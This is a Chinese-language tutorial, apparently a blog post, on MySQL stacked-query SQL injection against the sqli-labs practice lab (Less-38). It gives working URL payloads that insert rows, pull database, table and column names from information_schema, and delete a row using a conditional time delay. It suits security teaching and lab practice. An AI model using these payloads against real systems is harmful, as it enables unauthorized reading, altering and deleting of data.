Mysql注入 -- 堆叠注入

你上学时没读过的书、没上过的课、没跑过的步，总有一天会让你全部还回来。。。

----  网易云热评

 

一、堆叠注入介绍

1、多条sql语句同时执行

2、union只能执行查询语句，堆叠可以执行增删改查

3、同时执行三条语句

select 1;select 2;select 3;

二、插入注入

1、找到注入点，添加一条数据

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(66,'aiyou','bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=66

2、获取数据库名称

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(67,database(),'bucuo') --+

再次访问http://192.168.139.129/sqli/Less-38/?id=67获取数据库名称

3、获取数据库中的表名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(71,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 2,1) ,(select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=71获取表名信息

4、获取表中的字段名

http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,password) values(74,(select column_name from information_schema.columns where table_name="users" limit 13,1) ,(select column_name from information_schema.columns where table_name="users" limit 12,1)) --+

再次访问http://192.168.139.129/sqli/Less-38/?id=74获取字段信息

三、删除删除注入

http://192.168.139.129/sqli/Less-38/?id=1';delete from users where id=74 and sleep(if((select database())=0x7365637572697479,5,0));

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧